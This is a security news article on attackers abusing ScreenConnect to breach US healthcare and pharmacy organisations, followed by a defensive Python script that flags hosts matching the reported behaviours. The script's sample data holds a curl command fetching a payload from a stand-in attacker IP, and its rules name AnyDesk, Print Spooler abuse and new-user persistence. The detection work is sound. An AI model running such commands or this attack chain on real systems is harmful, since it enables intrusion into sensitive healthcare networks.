Healthcare firms susceptible to ScreenConnect exploits

November 24, 2023

Hackers are using ScreenConnect exploits for remote access in cyberattacks targeting multiple healthcare organisations across the United States. According to reports, the threat actors recently leveraged the remote access tool to compromise several healthcare institutions.

The attacks focus on ScreenConnect instances used by Transaction Data Systems (TDS), a nationwide provider of integrated pharmacy supply chain and management systems operating in every US state.

Researchers first identified the breaches after detecting unusual activity on endpoints within two distinct healthcare organisations, raising concerns about a broader, larger-scale threat.

According to reports, the threat actor took several steps after gaining access, including installing additional remote access tools, such as further ScreenConnect or AnyDesk instances, to establish persistent access to the targeted environments.

The ScreenConnect exploits started in late October and continued into the early days of November.

The ScreenConnect exploits against healthcare companies, observed between October 28 and November 8, 2023, are ongoing, highlighting the persistence and adaptability of the threat actors.

The researchers noted that the threat operators employed similar TTPs across all identified incidents. A tactic common to these attacks was downloading a payload named text.xml. This detail indicates that a single threat group manages these campaigns.

The attacks use an XML file containing C# code that loads the Metasploit payload Meterpreter into system memory, avoiding detection by not relying on PowerShell. In addition, researchers noticed that the attackers had exploited the Print Spooler service to launch additional processes.

The compromised endpoints, both running Windows Server 2019, belonged to two distinct organisations: one in the pharmaceutical sector and another in healthcare.

Furthermore, the attackers used the remote access tool to install additional payloads, execute commands, transfer files, and install AnyDesk. The hackers also tried to create a new user account for persistent access.
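The behaviours described above (a payload named text.xml, the Print Spooler spawning child processes, a second remote access tool such as AnyDesk appearing next to ScreenConnect, commands run through the remote access client, and a newly created local user) are the kind of telemetry a defender can correlate per host. The following is an added example written for this article, not code from the researchers or from any vendor: a small Python triage routine that applies one predicate per observation to constructed process-creation and account-creation events and flags hosts where several distinct indicators fire. The event field names, the file paths and the sample records are assumptions made for the example; only the indicator behaviours come from the reporting above.

```python
"""Heuristic per-host triage for the ScreenConnect intrusion TTPs reported
above. Event schema, paths and sample records are constructed for this
example and are not taken from the incident."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class Event:
    host: str
    kind: str          # "process" (process creation) or "account" (local user created)
    image: str = ""    # executable that started (process events)
    parent: str = ""   # executable that started it (process events)
    cmdline: str = ""  # full command line (process events)
    user: str = ""     # account name created (account events)


def _proc(e: Event) -> bool:
    return e.kind == "process"


# One predicate per observation from the write-up. Each alone is noisy; the
# value comes from several firing on the same host.
RULES: Dict[str, Callable[[Event], bool]] = {
    # the payload named text.xml being fetched or written to disk
    "text_xml_payload": lambda e: (
        _proc(e) and re.search(r"\btext\.xml\b", e.cmdline, re.I) is not None),
    # Print Spooler (spoolsv.exe) launching a child process
    "spooler_child": lambda e: (
        _proc(e) and e.parent.lower().endswith("spoolsv.exe")),
    # AnyDesk appearing as a second remote access tool
    "anydesk_present": lambda e: (
        _proc(e) and "anydesk" in e.image.lower()),
    # a shell started under the ScreenConnect client (commands run via the tool)
    "screenconnect_shell": lambda e: (
        _proc(e) and "screenconnect" in e.parent.lower()
        and e.image.lower().endswith(("cmd.exe", "powershell.exe"))),
    # creation of a new local user for persistence
    "new_local_user": lambda e: e.kind == "account",
}


def evaluate(events: List[Event]) -> Dict[str, List[str]]:
    """Return, per host, the sorted list of distinct indicators that fired."""
    hits: Dict[str, set] = {}
    for e in events:
        for name, pred in RULES.items():
            if pred(e):
                hits.setdefault(e.host, set()).add(name)
    return {h: sorted(s) for h, s in hits.items()}


def triage(events: List[Event], threshold: int = 2) -> List[str]:
    """Hosts with at least `threshold` distinct indicators. A single hit
    (an admin creating an account, a driver install under the spooler)
    is not enough on its own to raise an alert."""
    return sorted(h for h, s in evaluate(events).items() if len(s) >= threshold)


# Constructed sample telemetry: one server showing the full chain, one
# workstation with a single, plausibly legitimate account creation.
SC_CLIENT = r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe"  # assumed path
SAMPLE_EVENTS = [
    Event("srv-pharm-01", "process", image=r"C:\Windows\System32\curl.exe", parent=SC_CLIENT,
          cmdline=r"curl.exe -o C:\Users\Public\text.xml http://203.0.113.10/text.xml"),
    Event("srv-pharm-01", "process", image=r"C:\Windows\System32\cmd.exe",
          parent=r"C:\Windows\System32\spoolsv.exe", cmdline="cmd.exe /c whoami"),
    Event("srv-pharm-01", "process", image=r"C:\Users\Public\AnyDesk.exe",
          parent=r"C:\Windows\System32\cmd.exe", cmdline="AnyDesk.exe --install"),
    Event("srv-pharm-01", "process", image=r"C:\Windows\System32\cmd.exe", parent=SC_CLIENT,
          cmdline="cmd.exe /c net user"),
    Event("srv-pharm-01", "account", user="svc_backup"),
    Event("ws-42", "process", image=r"C:\Windows\System32\notepad.exe",
          parent=r"C:\Windows\explorer.exe", cmdline="notepad.exe"),
    Event("ws-42", "account", user="jdoe"),
]

if __name__ == "__main__":
    for host, indicators in evaluate(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(indicators)}")
    print("hosts to escalate:", triage(SAMPLE_EVENTS))
```

Run as a script it lists the indicators seen on each host and escalates only `srv-pharm-01`; the workstation's lone account creation stays below the threshold. In a real deployment the predicates would be fed from process-creation and account-management audit events rather than the constructed list, and the `screenconnect_shell` rule in particular needs tuning against legitimate administrator use of the tool.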

Researchers traced the ScreenConnect instance back to the ‘rs.tdsclinical[.]com’ domain linked to TDS, raising questions about whether TDS itself suffered a breach or if the attackers exploited compromised credentials or an alternative mechanism.

These findings emphasise that organisations, especially those in the healthcare sector, urgently need enhanced cybersecurity measures to safeguard sensitive patient data and critical infrastructure.
